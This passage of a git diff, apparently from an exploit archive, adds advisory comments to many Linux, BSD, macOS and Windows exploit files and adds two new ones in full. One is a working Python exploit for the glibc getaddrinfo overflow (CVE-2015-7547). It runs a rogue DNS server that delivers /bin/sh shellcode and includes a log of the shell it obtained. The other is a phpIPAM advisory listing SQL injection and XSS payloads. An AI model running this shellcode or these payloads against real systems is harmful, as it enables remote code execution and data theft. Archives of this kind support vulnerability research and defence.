confirmed. +*/ + /* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */ diff --git a/platforms/linux/dos/35013.c b/platforms/linux/dos/35013.c index 7d6d7b299..9064606ba 100755 --- a/platforms/linux/dos/35013.c +++ b/platforms/linux/dos/35013.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/45036/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users. +*/ + #include #include diff --git a/platforms/linux/dos/35403.c b/platforms/linux/dos/35403.c index a251cd1d6..04ebcb813 100755 --- a/platforms/linux/dos/35403.c +++ b/platforms/linux/dos/35403.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/46630/info The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities. Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users. +*/ + #include #include diff --git a/platforms/linux/dos/35404.c b/platforms/linux/dos/35404.c index 2450e3bb8..7f95803e1 100755 --- a/platforms/linux/dos/35404.c +++ b/platforms/linux/dos/35404.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/46630/info The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities. Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users. +*/ #include #include diff --git a/platforms/linux/dos/35600.c b/platforms/linux/dos/35600.c index ab5ef3786..12850cbfc 100755 --- a/platforms/linux/dos/35600.c +++ b/platforms/linux/dos/35600.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/47296/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users. +*/ #include #include diff --git a/platforms/linux/dos/35820.c b/platforms/linux/dos/35820.c index 3c768d069..f88fe7144 100755 --- a/platforms/linux/dos/35820.c +++ b/platforms/linux/dos/35820.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/48101/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition. +*/ #include #include diff --git a/platforms/linux/dos/38589.c b/platforms/linux/dos/38589.c index 69106af0c..33fc416c4 100755 --- a/platforms/linux/dos/38589.c +++ b/platforms/linux/dos/38589.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/60586/info The Linux Kernel is prone to a local denial-of-service vulnerability. Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions. +*/ /* ** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop) diff --git a/platforms/linux/local/20000.c b/platforms/linux/local/20000.c index 9f7e38252..2d5ac33db 100755 --- a/platforms/linux/local/20000.c +++ b/platforms/linux/local/20000.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/1322/info POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an additional form of privilege control to enable more specific control over what priviliged processes can do. Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a privileged process can perform. By setting specific bits, the actions of priviliged processes can be controlled -- access can be granted for various functions only to the specific parts of a program that require them. It is a security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid program that attempts to drop priviliges before executing code that could be dangerous if run as root, such as what sendmail does. When sendmail attempts to drop priviliges using setuid(getuid()), it fails not having the capabilities required to do so in its bitfields. It continues executing with superuser priviliges, and can run a users .forward file as root leading to a complete compromise. Procmail can also be exploited in this manner. @@ -20,6 +21,8 @@ set a simple su - yomama should give you root. This exploit was written by me in a hurry, I hope there are no mistakes +*/ + -- snip -- ex.c -- diff --git a/platforms/linux/local/23634.c b/platforms/linux/local/23634.c index bc2bfac2f..ca42cf9d4 100755 --- a/platforms/linux/local/23634.c +++ b/platforms/linux/local/23634.c @@ -1,6 +1,6 @@ -source: http://www.securityfocus.com/bid/9550/info +// source: http://www.securityfocus.com/bid/9550/info -The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client. +// The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client. /* * Simple local exploit for 0verkill by pi3 (pi3ki31ny) diff --git a/platforms/linux/local/23658.c b/platforms/linux/local/23658.c index 3d82ab155..4a329ce83 100755 --- a/platforms/linux/local/23658.c +++ b/platforms/linux/local/23658.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/9596/info VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory. +*/ /* vserver@deadbeef.de modified the chroot-again exploit */ /* to work on vservers with "chmod 000 /vservers" */ diff --git a/platforms/linux/local/29446.c b/platforms/linux/local/29446.c index 81645f775..73b466fb5 100755 --- a/platforms/linux/local/29446.c +++ b/platforms/linux/local/29446.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/22014/info Grsecurity Kernel PaX is prone to a local privilege-escalation vulnerability. @@ -7,6 +8,7 @@ An attacker can exploit this issue to obtain superuser privileges. A successful NOTE: The vendor disputes the issue, stating that the application is not vulnerable. Digital Armaments has provided an exploit and updated advisory outlining specific details of this vulnerability. Please see the reference section for further information. +*/ /* ** expand_stack() PaX local root vulnerability diff --git a/platforms/linux/local/30604.c b/platforms/linux/local/30604.c index 9383a1e21..b540e7bb1 100755 --- a/platforms/linux/local/30604.c +++ b/platforms/linux/local/30604.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/25774/info The Linux kernel is prone to a local privilege-escalation vulnerability. @@ -5,6 +6,8 @@ The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers. Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue. +*/ + /* * exploit for x86_64 linux kernel ia32syscall emulation diff --git a/platforms/linux/local/30605.c b/platforms/linux/local/30605.c index 2bd0d1d64..461ab76a6 100755 --- a/platforms/linux/local/30605.c +++ b/platforms/linux/local/30605.c @@ -1,10 +1,14 @@ +/* source: http://www.securityfocus.com/bid/25774/info +/* The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers. Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue. +*/ + /* ***************************************************************************************** diff --git a/platforms/linux/local/32805.c b/platforms/linux/local/32805.c index b4898c7a6..2e0891bc9 100755 --- a/platforms/linux/local/32805.c +++ b/platforms/linux/local/32805.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/33846/info The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible operation. @@ -5,6 +6,8 @@ The Linux Kernel is prone to an information-disclosure vulnerability because it Successful exploits will allow attackers to view portions of kernel memory. Information harvested may be used in further attacks. Versions prior to Linux Kernel 2.6.28.8 are vulnerable. +*/ + int main(void) { diff --git a/platforms/linux/local/34987.c b/platforms/linux/local/34987.c index a2d6927a4..27b3bf4c6 100755 --- a/platforms/linux/local/34987.c +++ b/platforms/linux/local/34987.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/44758/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. +*/ /* * You've done it. After hours of gdb and caffeine, you've finally got a shell diff --git a/platforms/linux/local/36294.c b/platforms/linux/local/36294.c index accd34a3c..eb5461e4d 100755 --- a/platforms/linux/local/36294.c +++ b/platforms/linux/local/36294.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/50573/info The Linux kernel is prone to a local information-disclosure weakness. @@ -5,6 +6,8 @@ The Linux kernel is prone to a local information-disclosure weakness. Successful exploits allow local attackers to obtain the password length of a victim's account; information harvested may aid in further attacks. Linux kernel 3.1 and prior are vulnerable. +*/ + /* * A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1. diff --git a/platforms/linux/local/37543.c b/platforms/linux/local/37543.c index 98b181799..39b481b06 100755 --- a/platforms/linux/local/37543.c +++ b/platforms/linux/local/37543.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/54702/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. +*/ + /***************** rds_client.c ********************/ diff --git a/platforms/linux/local/39214.c b/platforms/linux/local/39214.c index 1b0b00731..a59e62580 100755 --- a/platforms/linux/local/39214.c +++ b/platforms/linux/local/39214.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/68048/info The Linux kernel is prone to a local information-disclosure vulnerability. @@ -5,6 +6,7 @@ The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks. Linux kernel 2.6.38 through 3.15-rc2 are vulnerable. +*/ /* * $File: media-enum-poc.c diff --git a/platforms/linux/remote/21725.c b/platforms/linux/remote/21725.c index 85e77ab68..22d9a9bca 100755 --- a/platforms/linux/remote/21725.c +++ b/platforms/linux/remote/21725.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/5503/info MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows. @@ -5,6 +6,7 @@ MySQL is is an open source relational database project, and is available for a n A weak default configuration problem has been reported in the Windows binary release of MySQL. Reportedly, the root user of the database is defined with no password, and granted login privileges from any host. This issue has been reported in the Windows binary release of MySQL. Other versions may share this default configuration, this has not however been confirmed. +*/ //mysqlfuck.c /*--||MySQLfuck||--*/ diff --git a/platforms/linux/remote/21726.c b/platforms/linux/remote/21726.c index 12c4e4c0c..5643112da 100755 --- a/platforms/linux/remote/21726.c +++ b/platforms/linux/remote/21726.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/5503/info MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows. @@ -5,6 +6,7 @@ MySQL is is an open source relational database project, and is available for a n A weak default configuration problem has been reported in the Windows binary release of MySQL. Reportedly, the root user of the database is defined with no password, and granted login privileges from any host. This issue has been reported in the Windows binary release of MySQL. Other versions may share this default configuration, this has not however been confirmed. +*/ /* Program: finger_mysql.c diff --git a/platforms/linux/remote/22129.c b/platforms/linux/remote/22129.c index 0c61a5f7c..7e5ab66f4 100755 --- a/platforms/linux/remote/22129.c +++ b/platforms/linux/remote/22129.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/6527/info A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun. @@ -5,6 +6,7 @@ A vulnerability has been discovered in H-Sphere Webshell. During the pre-authent Successful exploitation of this issue would allow an attacker to overwrite the vulnerable function's instruction pointer. By causing the program to return to attacker-supplied instructions, it may be possible to execute arbitrary code with the privileges of the target process. It should be noted that this issue was discovered in H-Sphere 2.3 RC3. It is not yet known whether earlier versions are also vulnerable. +*/ /* * Remote r00t exploit for Webshell 2.4 (possibly other versions). diff --git a/platforms/linux/remote/40339.py b/platforms/linux/remote/40339.py new file mode 100755 index 000000000..20a8daf1f --- /dev/null +++ b/platforms/linux/remote/40339.py @@ -0,0 +1,238 @@ +''' +add by SpeeDr00t@Blackfalcon (jang kyoung chip) + +This is a published vulnerability by google in the past. +Please refer to the link below. + +Reference: +- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html +- https://github.com/fjserna/CVE-2015-7547 +- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow + +When Google announced about this code(vulnerability), +it was missing information on shellcode. +So, I tried to completed the shellcode. +In the future, I hope to help your study. + + +(gdb) gdb -q client1 +Undefined command: "gdb". Try "help". +(gdb) r +Starting program: /home/haker/client1 +Got object file from memory but can't read symbols: File truncated. +[UDP] Total Data len recv 36 +[UDP] Total Data len recv 36 +udp send +sendto 1 +TCP Connected with 127.0.0.1:60259 +[TCP] Total Data len recv 76 +[TCP] Request1 len recv 36 +data1 = ��foobargooglecom +query = foobargooglecom$(�foobargooglecom +[TCP] Request2 len recv 36 +sendto 2 +data1_reply +data2_reply +[UDP] Total Data len recv 36 +[UDP] Total Data len recv 36 +udp send +sendto 1 +TCP Connected with 127.0.0.1:60260 +[TCP] Total Data len recv 76 +[TCP] Request1 len recv 36 +data1 = ��foobargooglecom +query = foobargooglecom$�7foobargooglecom +[TCP] Request2 len recv 36 +sendto 2 +data1_reply +data2_reply +process 6415 is executing new program: /bin/dash +$ id +uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) +$ + +''' + +import socket +import time +import struct +import threading + +IP = '192.168.111.5' # Insert your ip for bind() here... +ANSWERS1 = 184 + +terminate = False +last_reply = None +reply_now = threading.Event() + + +def dw(x): + return struct.pack('>H', x) + +def dd(x): + return struct.pack('>I', x) + +def dl(x): + return struct.pack('H', data[0:2])[0] + query_udp = data[12:] + + # Send truncated flag... so it retries over TCP + data = dw(id_udp) # id + data += dw(0x8380) # flags with truncated set + data += dw(1) # questions + data += dw(0) # answers + data += dw(0) # authoritative + data += dw(0) # additional + data += query_udp # question + data += '\x00' * 2500 # Need a long DNS response to force malloc + + answers.append((data, addr)) + + if len(answers) != 2: + continue + + counter += 1 + + if counter % 4 == 2: + answers = answers[::-1] + + + print 'udp send ' + time.sleep(0.01) + sock_udp.sendto(*answers.pop(0)) + + print 'sendto 1 ' + reply_now.wait() + sock_udp.sendto(*answers.pop(0)) + print 'sendto 2 ' + + sock_udp.close() + + +def tcp_thread(): + global terminate + counter = -1 + + #Open TCP socket + sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock_tcp.bind((IP, 53)) + sock_tcp.listen(10) + + print 'a' + + while not terminate: + conn, addr = sock_tcp.accept() + counter += 1 + print 'TCP Connected with ' + addr[0] + ':' + str(addr[1]) + + # Read entire packet + data = conn.recv(1024) + print '[TCP] Total Data len recv ' + str(len(data)) + + reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0]) + print '[TCP] Request1 len recv ' + str(reqlen1) + data1 = data[2:2+reqlen1] + + print 'data1 = ' +data1 + + id1 = struct.unpack('>H', data1[0:2])[0] + query1 = data[12:] + + print 'query = ' + query1 + + # Do we have an extra request? + data2 = None + if len(data) > 2+reqlen1: + reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0]) + print '[TCP] Request2 len recv ' + str(reqlen2) + data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2] + id2 = struct.unpack('>H', data2[0:2])[0] + query2 = data2[12:] + + + + # Reply them on different packets + data = '' + data += dw(id1) # id + data += dw(0x8180) # flags + data += dw(1) # questions + data += dw(ANSWERS1) # answers + data += dw(0) # authoritative + data += dw(0) # additional + data += query1 # question + + + + for i in range(ANSWERS1): + answer = dw(0xc00c) # name compressed + answer += dw(1) # type A + answer += dw(1) # class + answer += dd(13) # ttl + answer += dw(4) # data length + answer += 'D' * 4 # data + + data += answer + + data1_reply = dw(len(data)) + data + + if data2: + data = '' + data += dw(id2) + data += 'A' * (6) + data += '\x08\xc5\xff\xff\xff\x7f\x00\x00' + data += '\x90' * (44) + data += '\x90' * (1955) + data += '\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05' + data += '\x90' * (100) + data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00' + data += 'F' * (8) + data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00' + data += 'G' * (134) + data2_reply = dw(len(data)) + data + else: + data2_reply = None + + reply_now.set() + time.sleep(0.01) + conn.sendall(data1_reply) + print 'data1_reply' + time.sleep(0.01) + if data2: + conn.sendall(data2_reply) + print 'data2_reply' + + reply_now.clear() + + sock_tcp.shutdown(socket.SHUT_RDWR) + sock_tcp.close() + + +if __name__ == "__main__": + + t = threading.Thread(target=udp_thread) + t.daemon = True + t.start() + tcp_thread() + terminate = True diff --git a/platforms/multiple/dos/19423.c b/platforms/multiple/dos/19423.c index 5ebb8a4b6..d53bdd7bd 100755 --- a/platforms/multiple/dos/19423.c +++ b/platforms/multiple/dos/19423.c @@ -1,6 +1,9 @@ +/* source: http://www.securityfocus.com/bid/526/info Operating systems with a shared memory implementation based on or influenced by the 4.4BSD code may be vulnerable to a denial of service attack The problem exists because you can mmap() or shmget() as much memory as you'd like bypassing rlimits. When you trigger pagefaults, the system will begin allocating the memory (it's not actually allocated at first) and run out. With System V IPC the memory remains allocated even after the process has stopped running. +*/ + /* * This program can be used to exploit DoS bugs in the VM systems or utility diff --git a/platforms/multiple/dos/20810.c b/platforms/multiple/dos/20810.c index c95b6c811..839c2f5aa 100755 --- a/platforms/multiple/dos/20810.c +++ b/platforms/multiple/dos/20810.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. @@ -5,6 +6,7 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. +*/ /* * imland - improved multiple land diff --git a/platforms/multiple/dos/20813.c b/platforms/multiple/dos/20813.c index 8d23332d3..becff67c0 100755 --- a/platforms/multiple/dos/20813.c +++ b/platforms/multiple/dos/20813.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. @@ -5,6 +6,8 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. +*/ + /**************************************************************/ /* */ diff --git a/platforms/multiple/dos/20997.c b/platforms/multiple/dos/20997.c index 093e7905e..219e1dd6e 100755 --- a/platforms/multiple/dos/20997.c +++ b/platforms/multiple/dos/20997.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2997/info A potential denial of service vulnerability exists in several TCP stack implementations. @@ -5,6 +6,8 @@ A potential denial of service vulnerability exists in several TCP stack implemen TCP has a MSS (maximum segment size) option that is used by a TCP client to announce to a peer the maximum amount of TCP data that can be sent per segment. The potential for attacks exists because in many cases only a small minimum value is enforced for the MSS. By setting the MSS to a low value (such as 1) and making requests for large amounts of data through a TCP service, an attacker could effectively cause a denial of service by causing a large workload on a system. +*/ + /* * (C)Copyright 2001 Darren Reed. diff --git a/platforms/multiple/remote/33877.c b/platforms/multiple/remote/33877.c index 1f079c0b6..4ba98ef0d 100755 --- a/platforms/multiple/remote/33877.c +++ b/platforms/multiple/remote/33877.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. @@ -5,6 +6,7 @@ NovaStor NovaNET is prone to code-execution, denial-of-service, and information- An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer. NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability. +*/ /* novanet-own-lnx.c * diff --git a/platforms/openbsd/local/21373.c b/platforms/openbsd/local/21373.c index 4d3096e7b..5c9bfd1d4 100755 --- a/platforms/openbsd/local/21373.c +++ b/platforms/openbsd/local/21373.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/4495/info OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information. @@ -5,6 +6,7 @@ OpenBSD ships with a number of cron jobs configured by default. The tasks are fo The mail(1) utility is used to send the summaries to the root user. This utility supports escaped characters in message text indicating commands to be executed during processing. If attacker-supplied data can be included in the message text passed to mail(1), commands specified by the attacker may be executed as root. If the attacker embeds the escape sequence followed by an arbitrary command in this data, the commands will be executed as root when the cron task runs. It is possible for an attacker to embed data in filenames, which are included in the emails. +*/ /* * (c) 2002 venglin@freebsd.lublin.pl diff --git a/platforms/osx/local/25055.c b/platforms/osx/local/25055.c index 72d3c8488..85512a530 100755 --- a/platforms/osx/local/25055.c +++ b/platforms/osx/local/25055.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/12314/info Reportedly a local integer overflow vulnerability affects the Darwin Kernel. This issue is due to a failure of the affected to properly handle integer signedness. An attacker may leverage this issue to cause the affected computer to crash, denying service to legitimate users. It has been speculated that this issue may also be leverage to escalate privileges, although this is unconfirmed. +*/ //---------------------( fm-nacho.c )-------------------------- /* diff --git a/platforms/osx/local/29201.c b/platforms/osx/local/29201.c index 9d19f3f41..858ed596c 100755 --- a/platforms/osx/local/29201.c +++ b/platforms/osx/local/29201.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/21349/info Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call. @@ -5,6 +6,8 @@ Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue o Attackers may exploit this issue to cause a kernel panic, effectively denying further service to legitimate users. Due to the nature of this issue, successful exploits may potentially result in the execution of arbitrary machine code in the context of the affected kernel, but this has not been confirmed. Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected. +*/ + /* * Copyright 2006 (c) LMH . diff --git a/platforms/php/webapps/40338.txt b/platforms/php/webapps/40338.txt new file mode 100755 index 000000000..67115972a --- /dev/null +++ b/platforms/php/webapps/40338.txt @@ -0,0 +1,187 @@ +PHPIPAM 1.2.1 Multiple Vulnerabilities + +Author: Saeed reza Zamanian [penetrationtest @ Linkedin] + +Product: 06 Sep 2016 +Tested Version: phpipam-1.2.1 (Latest Version - modified on 2016-02-13) +Vendor: http://phpipam.net/ +Product URL: https://sourceforge.net/projects/phpipam/ + +Date: 20 Mar 2016 + + +About Product: +--------------- +phpipam is an open-source web IP address management application (IPAM). Its goal is to provide light, modern and useful IP address management. +It is php-based application with MySQL database backend, using jQuery libraries, ajax and some HTML5/CSS3 features. + + + +Vulnerability Report: +---------------------- +SQL Injection Vulnerability (3 Items): +on Tools>Changelog +[sPage] Parameter is vulnerable against SQLi. +Method: GET +Payload: +http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50' [SQLi] + + +on http://[Site]/phpipam/app/tools/user-menu/user-edit.php +[lang] and [printLimit] Parameters are vulnerable against SQLi. +Payload: +Method : POST +PostData= +real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&mailNotify=No&mailChangelog=No&printLimit=30&lang=9'[SQLi] + +OR +Method : POST +http://[Site]/phpipam/app/tools/user-menu/user-edit.php +PostData= +real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&lang=9&mailNotify=No&mailChangelog=No&printLimit=30'[SQLi] + +=============================================== + +XSS Vulnerability (36 Items): +Method: POST +http://[Site]/phpipam/app/admin/languages/edit.php +PostData: +langid=2">&action=edit + +http://[Site]/phpipam/app/admin/languages/edit.php +PostData: +langid=2&action=edit"> + +http://[Site]/phpipam/app/admin/widgets/edit.php +PostData: +wid=1">&action=edit + +http://[Site]/phpipam/app/admin/widgets/edit.php +PostData: +wid=1&action=edit"> + +http://[Site]/phpipam/app/admin/scan-agents/edit.php +PostData: +id=1&action=edit"> + +http://[Site]/phpipam/app/admin/groups/edit-group.php +PostData: +id=2">&action=edit + +http://[Site]/phpipam/app/admin/groups/edit-group.php +PostData: +id=2&action=edit"> + +http://[Site]/phpipam/app/admin/users/edit.php +PostData: +id=1&action=edit"> + +http://[Site]/phpipam/app/admin/tags/edit.php +PostData: +id=1&action=edit"> + +http://[Site]/phpipam/app/admin/instructions/preview.php +PostData: +instructions=You+can+write+instructions+under+admin+menu!"> + +http://[Site]/phpipam/app/admin/sections/edit.php +PostData: +sectionId=2">&action=edit + +http://[Site]/phpipam/app/admin/sections/edit.php +PostData: +sectionId=2&action=edit"> + +http://[Site]/phpipam/app/admin/subnets/edit.php +PostData: +sectionId=2&subnetId=1">&action=edit + +http://[Site]/phpipam/app/admin/subnets/edit.php +PostData: +sectionId=2&subnetId=1&action=edit"> + +http://[Site]/phpipam/app/admin/subnets/edit-folder.php +PostData: +sectionId=1&subnetId=5&action=edit">&location=IPaddresses + +http://[Site]/phpipam/app/admin/devices/edit.php +PostData: +switchId=1&action=edit"> + +http://[Site]/phpipam/app/admin/device-types/edit.php +PostData: +tid=1&action=edit"> + +http://[Site]/phpipam/app/admin/vlans/edit.php +PostData: +vlanId=1">&action=edit&vlanNum= + +http://[Site]/phpipam/app/admin/vlans/edit.php +PostData: +vlanId=1&action=edit">&vlanNum= + +http://[Site]/phpipam/app/admin/vlans/edit.php +PostData: +vlanId=1&action=edit&vlanNum="> + +http://[Site]/phpipam/app/admin/vlans/edit-domain.php +PostData: +id=">&action=add + +http://[Site]/phpipam/app/admin/vlans/edit-domain.php +PostData: +id=&action=add"> + +http://[Site]/phpipam/app/admin/nameservers/edit.php +PostData: +nameserverId=1">&action=edit + +http://[Site]/phpipam/app/admin/nameservers/edit.php +PostData: +nameserverId=1&action=edit"> + +http://[Site]/phpipam/app/admin/custom-fields/edit.php +PostData: +action=add">&fieldName=&table=ipaddresses + +http://[Site]/phpipam/app/admin/custom-fields/edit.php +PostData: +action=add&fieldName=&table=ipaddresses"> + +http://[Site]/phpipam/app/admin/custom-fields/filter.php +PostData: +table=ipaddresses"> + +http://[Site]/phpipam/app/admin/replace-fields/result.php +PostData: +field=description">&search=a&csrf_cookie=892d2a900ec7fc1ba9486ec171a36f71&replace=a + +http://[Site]/phpipam/app/admin/subnets/edit.php +PostData: +sectionId=1&subnetId=6&action=edit&location=IPaddresses"> + + +http://[Site]/phpipam/app/admin/subnets/edit-folder.php +PostData: +sectionId=2&subnetId=">&action=add&location=IPaddresses + +http://[Site]/phpipam/app/tools/devices/devices-print.php +PostData: +ffield=hostname">&fval=a&direction=hostname%7Casc + +http://[Site]/phpipam/app/tools/devices/devices-print.php +PostData: +ffield=hostname&fval=a">&direction=hostname%7Casc + +http://[Site]/phpipam/app/tools/devices/devices-print.php +PostData: +ffield=hostname&fval=a&direction=hostname%7Casc"> + +http://[Site]/phpipam/app/tools/subnet-masks/popup.php +PostData: +closeClass=hidePopups"> + +Method: GET +http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50"> + +http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a"> diff --git a/platforms/unix/local/20381.c b/platforms/unix/local/20381.c index cf7aff67a..a4951afbe 100755 --- a/platforms/unix/local/20381.c +++ b/platforms/unix/local/20381.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/1909/info ManTrap is a "honeypot" intrusion detection system designed to lure attackers into it for analysis. The honeypot is implemented as a chroot'ed Solaris environment, designed to look and feel real to an attacker who gains access to it. @@ -5,6 +6,7 @@ ManTrap is a "honeypot" intrusion detection system designed to lure attackers in Chroot (change root) is a unix mechanism that allows an administrator to force a process/process group to run under a subset of the file system, denying access to any other parts of the file system. It is possible for an attacker to guess that they are on a chrooted() ManTrap system by looking at the inode of the root directory (ls -id /). If it is high (usually within the 100000-200000 range), then the root directory is a chrooted() subset of a larger filesystem. This vulnerability, combined with hidden process disclosure (bugtraq ID 1908) should fairly accurately verify to an attaacker (without root privs) that the host is a ManTrap honeypot, defeating its purpose. +*/ /* diff --git a/platforms/windows/dos/20812.c b/platforms/windows/dos/20812.c index b1b892c43..e82cac408 100755 --- a/platforms/windows/dos/20812.c +++ b/platforms/windows/dos/20812.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco 